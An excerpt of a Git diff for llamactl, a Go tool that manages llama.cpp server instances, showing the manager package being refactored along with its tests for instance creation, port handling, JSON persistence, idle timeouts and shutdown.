LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst := instance.NewInstance("test-instance", globalSettings, options)
opts := inst.GetOptions()
if opts.IdleTimeout == nil || *opts.IdleTimeout != tt.expectedTimeout {
t.Errorf("Expected IdleTimeout %d, got %v", tt.expectedTimeout, opts.IdleTimeout)
}
})
}
}

View File

@@ -1,442 +0,0 @@
package llamactl_test
import (
"encoding/json"
"testing"
llamactl "llamactl/pkg"
)
func TestNewInstance(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
if instance.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
}
if instance.Running {
t.Error("New instance should not be running")
}
// Check that options were properly set with defaults applied
opts := instance.GetOptions()
if opts.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
}
if opts.Port != 8080 {
t.Errorf("Expected port 8080, got %d", opts.Port)
}
// Check that defaults were applied
if opts.AutoRestart == nil || !*opts.AutoRestart {
t.Error("Expected AutoRestart to be true (default)")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 3 {
t.Errorf("Expected MaxRestarts to be 3 (default), got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 5 {
t.Errorf("Expected RestartDelay to be 5 (default), got %v", opts.RestartDelay)
}
}
func TestNewInstance_WithRestartOptions(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
// Override some defaults
autoRestart := false
maxRestarts := 10
restartDelay := 15
options := &llamactl.CreateInstanceOptions{
AutoRestart: &autoRestart,
MaxRestarts: &maxRestarts,
RestartDelay: &restartDelay,
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
opts := instance.GetOptions()
// Check that explicit values override defaults
if opts.AutoRestart == nil || *opts.AutoRestart {
t.Error("Expected AutoRestart to be false (overridden)")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 10 {
t.Errorf("Expected MaxRestarts to be 10 (overridden), got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 15 {
t.Errorf("Expected RestartDelay to be 15 (overridden), got %v", opts.RestartDelay)
}
}
func TestNewInstance_ValidationAndDefaults(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
// Test with invalid negative values
invalidMaxRestarts := -5
invalidRestartDelay := -10
options := &llamactl.CreateInstanceOptions{
MaxRestarts: &invalidMaxRestarts,
RestartDelay: &invalidRestartDelay,
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
opts := instance.GetOptions()
// Check that negative values were corrected to 0
if opts.MaxRestarts == nil || *opts.MaxRestarts != 0 {
t.Errorf("Expected MaxRestarts to be corrected to 0, got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 0 {
t.Errorf("Expected RestartDelay to be corrected to 0, got %v", opts.RestartDelay)
}
}
func TestSetOptions(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
initialOptions := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, initialOptions)
// Update options
newOptions := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
instance.SetOptions(newOptions)
opts := instance.GetOptions()
if opts.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.Model)
}
if opts.Port != 8081 {
t.Errorf("Expected updated port 8081, got %d", opts.Port)
}
// Check that defaults are still applied
if opts.AutoRestart == nil || !*opts.AutoRestart {
t.Error("Expected AutoRestart to be true (default)")
}
}
func TestSetOptions_NilOptions(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
originalOptions := instance.GetOptions()
// Try to set nil options
instance.SetOptions(nil)
// Options should remain unchanged
currentOptions := instance.GetOptions()
if currentOptions.Model != originalOptions.Model {
t.Error("Options should not change when setting nil options")
}
}
func TestGetProxy(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
}
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Host: "localhost",
Port: 8080,
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
// Get proxy for the first time
proxy1, err := instance.GetProxy()
if err != nil {
t.Fatalf("GetProxy failed: %v", err)
}
if proxy1 == nil {
t.Error("Expected proxy to be created")
}
// Get proxy again - should return cached version
proxy2, err := instance.GetProxy()
if err != nil {
t.Fatalf("GetProxy failed: %v", err)
}
if proxy1 != proxy2 {
t.Error("Expected cached proxy to be returned")
}
}
func TestMarshalJSON(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
data, err := json.Marshal(instance)
if err != nil {
t.Fatalf("JSON marshal failed: %v", err)
}
// Check that JSON contains expected fields
var result map[string]interface{}
err = json.Unmarshal(data, &result)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
if result["name"] != "test-instance" {
t.Errorf("Expected name 'test-instance', got %v", result["name"])
}
if result["running"] != false {
t.Errorf("Expected running false, got %v", result["running"])
}
// Check that options are included
options_data, ok := result["options"]
if !ok {
t.Error("Expected options to be included in JSON")
}
options_map, ok := options_data.(map[string]interface{})
if !ok {
t.Error("Expected options to be a map")
}
if options_map["model"] != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %v", options_map["model"])
}
}
func TestUnmarshalJSON(t *testing.T) {
jsonData := `{
"name": "test-instance",
"running": true,
"options": {
"model": "/path/to/model.gguf",
"port": 8080,
"auto_restart": false,
"max_restarts": 5
}
}`
var instance llamactl.Instance
err := json.Unmarshal([]byte(jsonData), &instance)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
if instance.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
}
if !instance.Running {
t.Error("Expected running to be true")
}
opts := instance.GetOptions()
if opts == nil {
t.Fatal("Expected options to be set")
}
if opts.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
}
if opts.Port != 8080 {
t.Errorf("Expected port 8080, got %d", opts.Port)
}
if opts.AutoRestart == nil || *opts.AutoRestart {
t.Error("Expected AutoRestart to be false")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 5 {
t.Errorf("Expected MaxRestarts to be 5, got %v", opts.MaxRestarts)
}
}
func TestUnmarshalJSON_PartialOptions(t *testing.T) {
jsonData := `{
"name": "test-instance",
"running": false,
"options": {
"model": "/path/to/model.gguf"
}
}`
var instance llamactl.Instance
err := json.Unmarshal([]byte(jsonData), &instance)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
opts := instance.GetOptions()
if opts.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
}
// Note: Defaults are NOT applied during unmarshaling
// They should only be applied by NewInstance or SetOptions
if opts.AutoRestart != nil {
t.Error("Expected AutoRestart to be nil (no defaults applied during unmarshal)")
}
}
func TestUnmarshalJSON_NoOptions(t *testing.T) {
jsonData := `{
"name": "test-instance",
"running": false
}`
var instance llamactl.Instance
err := json.Unmarshal([]byte(jsonData), &instance)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
if instance.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
}
if instance.Running {
t.Error("Expected running to be false")
}
opts := instance.GetOptions()
if opts != nil {
t.Error("Expected options to be nil when not provided in JSON")
}
}
func TestCreateInstanceOptionsValidation(t *testing.T) {
tests := []struct {
name string
maxRestarts *int
restartDelay *int
expectedMax int
expectedDelay int
}{
{
name: "nil values",
maxRestarts: nil,
restartDelay: nil,
expectedMax: 0, // Should remain nil, but we can't easily test nil in this structure
expectedDelay: 0,
},
{
name: "valid positive values",
maxRestarts: intPtr(10),
restartDelay: intPtr(30),
expectedMax: 10,
expectedDelay: 30,
},
{
name: "zero values",
maxRestarts: intPtr(0),
restartDelay: intPtr(0),
expectedMax: 0,
expectedDelay: 0,
},
{
name: "negative values should be corrected",
maxRestarts: intPtr(-5),
restartDelay: intPtr(-10),
expectedMax: 0,
expectedDelay: 0,
},
}
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &llamactl.CreateInstanceOptions{
MaxRestarts: tt.maxRestarts,
RestartDelay: tt.restartDelay,
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := llamactl.NewInstance("test", globalSettings, options)
opts := instance.GetOptions()
if tt.maxRestarts != nil {
if opts.MaxRestarts == nil {
t.Error("Expected MaxRestarts to be set")
} else if *opts.MaxRestarts != tt.expectedMax {
t.Errorf("Expected MaxRestarts %d, got %d", tt.expectedMax, *opts.MaxRestarts)
}
}
if tt.restartDelay != nil {
if opts.RestartDelay == nil {
t.Error("Expected RestartDelay to be set")
} else if *opts.RestartDelay != tt.expectedDelay {
t.Errorf("Expected RestartDelay %d, got %d", tt.expectedDelay, *opts.RestartDelay)
}
}
})
}
}

272
pkg/manager/manager.go Normal file
View File

@@ -0,0 +1,272 @@
package manager
import (
"encoding/json"
"fmt"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"log"
"os"
"path/filepath"
"strings"
"sync"
"time"
)
// InstanceManager defines the interface for managing instances of the llama server.
type InstanceManager interface {
ListInstances() ([]*instance.Process, error)
CreateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
GetInstance(name string) (*instance.Process, error)
UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
DeleteInstance(name string) error
StartInstance(name string) (*instance.Process, error)
StopInstance(name string) (*instance.Process, error)
RestartInstance(name string) (*instance.Process, error)
GetInstanceLogs(name string) (string, error)
Shutdown()
}
type instanceManager struct {
mu sync.RWMutex
instances map[string]*instance.Process
ports map[int]bool
instancesConfig config.InstancesConfig
// Timeout checker
timeoutChecker *time.Ticker
shutdownChan chan struct{}
shutdownDone chan struct{}
isShutdown bool
}
// NewInstanceManager creates a new instance of InstanceManager.
func NewInstanceManager(instancesConfig config.InstancesConfig) InstanceManager {
if instancesConfig.TimeoutCheckInterval <= 0 {
instancesConfig.TimeoutCheckInterval = 5 // Default to 5 minutes if not set
}
im := &instanceManager{
instances: make(map[string]*instance.Process),
ports: make(map[int]bool),
instancesConfig: instancesConfig,
timeoutChecker: time.NewTicker(time.Duration(instancesConfig.TimeoutCheckInterval) * time.Minute),
shutdownChan: make(chan struct{}),
shutdownDone: make(chan struct{}),
}
// Load existing instances from disk
if err := im.loadInstances(); err != nil {
log.Printf("Error loading instances: %v", err)
}
// Start the timeout checker goroutine after initialization is complete
go func() {
defer close(im.shutdownDone)
for {
select {
case <-im.timeoutChecker.C:
im.checkAllTimeouts()
case <-im.shutdownChan:
return // Exit goroutine on shutdown
}
}
}()
return im
}
func (im *instanceManager) getNextAvailablePort() (int, error) {
portRange := im.instancesConfig.PortRange
for port := portRange[0]; port <= portRange[1]; port++ {
if !im.ports[port] {
im.ports[port] = true
return port, nil
}
}
return 0, fmt.Errorf("no available ports in the specified range")
}
// persistInstance saves an instance to its JSON file
func (im *instanceManager) persistInstance(instance *instance.Process) error {
if im.instancesConfig.InstancesDir == "" {
return nil // Persistence disabled
}
instancePath := filepath.Join(im.instancesConfig.InstancesDir, instance.Name+".json")
tempPath := instancePath + ".tmp"
// Serialize instance to JSON
jsonData, err := json.MarshalIndent(instance, "", " ")
if err != nil {
return fmt.Errorf("failed to marshal instance %s: %w", instance.Name, err)
}
// Write to temporary file first
if err := os.WriteFile(tempPath, jsonData, 0644); err != nil {
return fmt.Errorf("failed to write temp file for instance %s: %w", instance.Name, err)
}
// Atomic rename
if err := os.Rename(tempPath, instancePath); err != nil {
os.Remove(tempPath) // Clean up temp file
return fmt.Errorf("failed to rename temp file for instance %s: %w", instance.Name, err)
}
return nil
}
func (im *instanceManager) Shutdown() {
im.mu.Lock()
defer im.mu.Unlock()
// Check if already shutdown
if im.isShutdown {
return
}
im.isShutdown = true
// Signal the timeout checker to stop
close(im.shutdownChan)
// Release lock temporarily to wait for goroutine
im.mu.Unlock()
// Wait for the timeout checker goroutine to actually stop
<-im.shutdownDone
// Reacquire lock
im.mu.Lock()
// Now stop the ticker
if im.timeoutChecker != nil {
im.timeoutChecker.Stop()
}
var wg sync.WaitGroup
wg.Add(len(im.instances))
for name, inst := range im.instances {
if !inst.Running {
wg.Done() // If instance is not running, just mark it as done
continue
}
go func(name string, inst *instance.Process) {
defer wg.Done()
fmt.Printf("Stopping instance %s...\n", name)
// Attempt to stop the instance gracefully
if err := inst.Stop(); err != nil {
fmt.Printf("Error stopping instance %s: %v\n", name, err)
}
}(name, inst)
}
wg.Wait()
fmt.Println("All instances stopped.")
}
// loadInstances restores all instances from disk
func (im *instanceManager) loadInstances() error {
if im.instancesConfig.InstancesDir == "" {
return nil // Persistence disabled
}
// Check if instances directory exists
if _, err := os.Stat(im.instancesConfig.InstancesDir); os.IsNotExist(err) {
return nil // No instances directory, start fresh
}
// Read all JSON files from instances directory
files, err := os.ReadDir(im.instancesConfig.InstancesDir)
if err != nil {
return fmt.Errorf("failed to read instances directory: %w", err)
}
loadedCount := 0
for _, file := range files {
if file.IsDir() || !strings.HasSuffix(file.Name(), ".json") {
continue
}
instanceName := strings.TrimSuffix(file.Name(), ".json")
instancePath := filepath.Join(im.instancesConfig.InstancesDir, file.Name())
if err := im.loadInstance(instanceName, instancePath); err != nil {
log.Printf("Failed to load instance %s: %v", instanceName, err)
continue
}
loadedCount++
}
if loadedCount > 0 {
log.Printf("Loaded %d instances from persistence", loadedCount)
// Auto-start instances that have auto-restart enabled
go im.autoStartInstances()
}
return nil
}
// loadInstance loads a single instance from its JSON file
func (im *instanceManager) loadInstance(name, path string) error {
data, err := os.ReadFile(path)
if err != nil {
return fmt.Errorf("failed to read instance file: %w", err)
}
var persistedInstance instance.Process
if err := json.Unmarshal(data, &persistedInstance); err != nil {
return fmt.Errorf("failed to unmarshal instance: %w", err)
}
// Validate the instance name matches the filename
if persistedInstance.Name != name {
return fmt.Errorf("instance name mismatch: file=%s, instance.Name=%s", name, persistedInstance.Name)
}
// Create new inst using NewInstance (handles validation, defaults, setup)
inst := instance.NewInstance(name, &im.instancesConfig, persistedInstance.GetOptions())
// Restore persisted fields that NewInstance doesn't set
inst.Created = persistedInstance.Created
inst.Running = persistedInstance.Running
// Check for port conflicts and add to maps
if inst.GetOptions() != nil && inst.GetOptions().Port > 0 {
port := inst.GetOptions().Port
if im.ports[port] {
return fmt.Errorf("port conflict: instance %s wants port %d which is already in use", name, port)
}
im.ports[port] = true
}
im.instances[name] = inst
return nil
}
// autoStartInstances starts instances that were running when persisted and have auto-restart enabled
func (im *instanceManager) autoStartInstances() {
im.mu.RLock()
var instancesToStart []*instance.Process
for _, inst := range im.instances {
if inst.Running && // Was running when persisted
inst.GetOptions() != nil &&
inst.GetOptions().AutoRestart != nil &&
*inst.GetOptions().AutoRestart {
instancesToStart = append(instancesToStart, inst)
}
}
im.mu.RUnlock()
for _, inst := range instancesToStart {
log.Printf("Auto-starting instance %s", inst.Name)
// Reset running state before starting (since Start() expects stopped instance)
inst.Running = false
if err := inst.Start(); err != nil {
log.Printf("Failed to auto-start instance %s: %v", inst.Name, err)
}
}
}

509
pkg/manager/manager_test.go Normal file
View File

@@ -0,0 +1,509 @@
package manager_test
import (
"fmt"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"os"
"path/filepath"
"strings"
"sync"
"testing"
"time"
)
func TestNewInstanceManager(t *testing.T) {
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
LogsDir: "/tmp/test",
MaxInstances: 5,
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
TimeoutCheckInterval: 5,
}
manager := manager.NewInstanceManager(cfg)
if manager == nil {
t.Fatal("NewInstanceManager returned nil")
}
// Test initial state
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 0 {
t.Errorf("Expected empty instance list, got %d instances", len(instances))
}
}
func TestCreateInstance_Success(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
inst, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
if inst.Name != "test-instance" {
t.Errorf("Expected instance name 'test-instance', got %q", inst.Name)
}
if inst.Running {
t.Error("New instance should not be running")
}
if inst.GetOptions().Port != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetOptions().Port)
}
}
func TestCreateInstance_ValidationAndLimits(t *testing.T) {
// Test duplicate names
mngr := createTestManager()
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := mngr.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("First CreateInstance failed: %v", err)
}
// Try to create duplicate
_, err = mngr.CreateInstance("test-instance", options)
if err == nil {
t.Error("Expected error for duplicate instance name")
}
if !strings.Contains(err.Error(), "already exists") {
t.Errorf("Expected duplicate name error, got: %v", err)
}
// Test max instances limit
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
MaxInstances: 1, // Very low limit for testing
TimeoutCheckInterval: 5,
}
limitedManager := manager.NewInstanceManager(cfg)
_, err = limitedManager.CreateInstance("instance1", options)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
// This should fail due to max instances limit
_, err = limitedManager.CreateInstance("instance2", options)
if err == nil {
t.Error("Expected error when exceeding max instances limit")
}
if !strings.Contains(err.Error(), "maximum number of instances") {
t.Errorf("Expected max instances error, got: %v", err)
}
}
func TestPortManagement(t *testing.T) {
manager := createTestManager()
// Test auto port assignment
options1 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst1, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
port1 := inst1.GetOptions().Port
if port1 < 8000 || port1 > 9000 {
t.Errorf("Expected port in range 8000-9000, got %d", port1)
}
// Test port conflict detection
options2 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model2.gguf",
Port: port1, // Same port - should conflict
},
}
_, err = manager.CreateInstance("instance2", options2)
if err == nil {
t.Error("Expected error for port conflict")
}
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "in use") {
t.Errorf("Expected port conflict error, got: %v", err)
}
// Test port release on deletion
specificPort := 8080
options3 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: specificPort,
},
}
_, err = manager.CreateInstance("port-test", options3)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
err = manager.DeleteInstance("port-test")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should be able to create new instance with same port
_, err = manager.CreateInstance("new-port-test", options3)
if err != nil {
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
}
}
func TestInstanceOperations(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create instance
created, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Get instance
retrieved, err := manager.GetInstance("test-instance")
if err != nil {
t.Fatalf("GetInstance failed: %v", err)
}
if retrieved.Name != created.Name {
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
}
// Update instance
newOptions := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
updated, err := manager.UpdateInstance("test-instance", newOptions)
if err != nil {
t.Fatalf("UpdateInstance failed: %v", err)
}
if updated.GetOptions().Model != "/path/to/new-model.gguf" {
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().Model)
}
// List instances
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 1 {
t.Errorf("Expected 1 instance, got %d", len(instances))
}
// Delete instance
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
_, err = manager.GetInstance("test-instance")
if err == nil {
t.Error("Instance should not exist after deletion")
}
// Test operations on non-existent instances
_, err = manager.GetInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
err = manager.DeleteInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
_, err = manager.UpdateInstance("nonexistent", options)
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
func TestPersistence(t *testing.T) {
tempDir := t.TempDir()
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
InstancesDir: tempDir,
MaxInstances: 10,
TimeoutCheckInterval: 5,
}
// Test instance persistence on creation
manager1 := manager.NewInstanceManager(cfg)
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
_, err := manager1.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Check that JSON file was created
expectedPath := filepath.Join(tempDir, "test-instance.json")
if _, err := os.Stat(expectedPath); os.IsNotExist(err) {
t.Errorf("Expected persistence file %s to exist", expectedPath)
}
// Test loading instances from disk
manager2 := manager.NewInstanceManager(cfg)
instances, err := manager2.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 1 {
t.Fatalf("Expected 1 loaded instance, got %d", len(instances))
}
if instances[0].Name != "test-instance" {
t.Errorf("Expected loaded instance name 'test-instance', got %q", instances[0].Name)
}
// Test port map populated from loaded instances (port conflict should be detected)
_, err = manager2.CreateInstance("new-instance", options) // Same port
if err == nil || !strings.Contains(err.Error(), "port") {
t.Errorf("Expected port conflict error, got: %v", err)
}
// Test file deletion on instance deletion
err = manager2.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
if _, err := os.Stat(expectedPath); !os.IsNotExist(err) {
t.Error("Expected persistence file to be deleted")
}
}
func TestTimeoutFunctionality(t *testing.T) {
// Test timeout checker initialization
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
TimeoutCheckInterval: 10,
MaxInstances: 5,
}
manager := manager.NewInstanceManager(cfg)
if manager == nil {
t.Fatal("Manager should be initialized with timeout checker")
}
manager.Shutdown() // Clean up
// Test timeout configuration and logic without starting the actual process
testManager := createTestManager()
defer testManager.Shutdown()
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst, err := testManager.CreateInstance("timeout-test", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Test timeout configuration is properly set
if inst.GetOptions().IdleTimeout == nil {
t.Fatal("Instance should have idle timeout configured")
}
if *inst.GetOptions().IdleTimeout != 1 {
t.Errorf("Expected idle timeout 1 minute, got %d", *inst.GetOptions().IdleTimeout)
}
// Test timeout logic without actually starting the process
// Create a mock time provider to simulate timeout
mockTime := NewMockTimeProvider(time.Now())
inst.SetTimeProvider(mockTime)
// Set instance to running state so timeout logic can work
inst.Running = true
// Simulate instance being "running" for timeout check (without actual process)
// We'll test the ShouldTimeout logic directly
inst.UpdateLastRequestTime()
// Initially should not timeout (just updated)
if inst.ShouldTimeout() {
t.Error("Instance should not timeout immediately after request")
}
// Advance time to trigger timeout
mockTime.SetTime(time.Now().Add(2 * time.Minute))
// Now it should timeout
if !inst.ShouldTimeout() {
t.Error("Instance should timeout after idle period")
}
// Reset running state to avoid shutdown issues
inst.Running = false
// Test that instance without timeout doesn't timeout
noTimeoutOptions := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
// No IdleTimeout set
}
noTimeoutInst, err := testManager.CreateInstance("no-timeout-test", noTimeoutOptions)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
noTimeoutInst.SetTimeProvider(mockTime)
noTimeoutInst.Running = true // Set to running for timeout check
noTimeoutInst.UpdateLastRequestTime()
// Even with time advanced, should not timeout
if noTimeoutInst.ShouldTimeout() {
t.Error("Instance without timeout configuration should never timeout")
}
// Reset running state to avoid shutdown issues
noTimeoutInst.Running = false
}
func TestConcurrentAccess(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
// Test concurrent operations
var wg sync.WaitGroup
errChan := make(chan error, 10)
// Concurrent instance creation
for i := 0; i < 5; i++ {
wg.Add(1)
go func(index int) {
defer wg.Done()
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instanceName := fmt.Sprintf("concurrent-test-%d", index)
if _, err := manager.CreateInstance(instanceName, options); err != nil {
errChan <- err
}
}(i)
}
// Concurrent list operations
for i := 0; i < 3; i++ {
wg.Add(1)
go func() {
defer wg.Done()
if _, err := manager.ListInstances(); err != nil {
errChan <- err
}
}()
}
wg.Wait()
close(errChan)
// Check for any errors during concurrent access
for err := range errChan {
t.Errorf("Concurrent access error: %v", err)
}
}
func TestShutdown(t *testing.T) {
manager := createTestManager()
// Create test instance
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Shutdown should not panic
manager.Shutdown()
// Multiple shutdowns should not panic
manager.Shutdown()
}
// Helper function to create a test manager with standard config
func createTestManager() manager.InstanceManager {
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
LogsDir: "/tmp/test",
MaxInstances: 10,
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
TimeoutCheckInterval: 5,
}
return manager.NewInstanceManager(cfg)
}
// Helper for timeout tests
type MockTimeProvider struct {
currentTime time.Time
mu sync.RWMutex
}
func NewMockTimeProvider(t time.Time) *MockTimeProvider {
return &MockTimeProvider{currentTime: t}
}
func (m *MockTimeProvider) Now() time.Time {
m.mu.RLock()
defer m.mu.RUnlock()
return m.currentTime
}
func (m *MockTimeProvider) SetTime(t time.Time) {
m.mu.Lock()
defer m.mu.Unlock()
m.currentTime = t
}

View File

@@ -1,68 +1,38 @@
package llamactl
package manager
import (
"fmt"
"sync"
"llamactl/pkg/instance"
"llamactl/pkg/validation"
"os"
"path/filepath"
)
// InstanceManager defines the interface for managing instances of the llama server.
type InstanceManager interface {
ListInstances() ([]*Instance, error)
CreateInstance(name string, options *CreateInstanceOptions) (*Instance, error)
GetInstance(name string) (*Instance, error)
UpdateInstance(name string, options *CreateInstanceOptions) (*Instance, error)
DeleteInstance(name string) error
StartInstance(name string) (*Instance, error)
StopInstance(name string) (*Instance, error)
RestartInstance(name string) (*Instance, error)
GetInstanceLogs(name string) (string, error)
}
type instanceManager struct {
mu sync.RWMutex
instances map[string]*Instance
ports map[int]bool
instancesConfig InstancesConfig
}
// NewInstanceManager creates a new instance of InstanceManager.
func NewInstanceManager(instancesConfig InstancesConfig) InstanceManager {
return &instanceManager{
instances: make(map[string]*Instance),
ports: make(map[int]bool),
instancesConfig: instancesConfig,
}
}
// ListInstances returns a list of all instances managed by the instance manager.
func (im *instanceManager) ListInstances() ([]*Instance, error) {
func (im *instanceManager) ListInstances() ([]*instance.Process, error) {
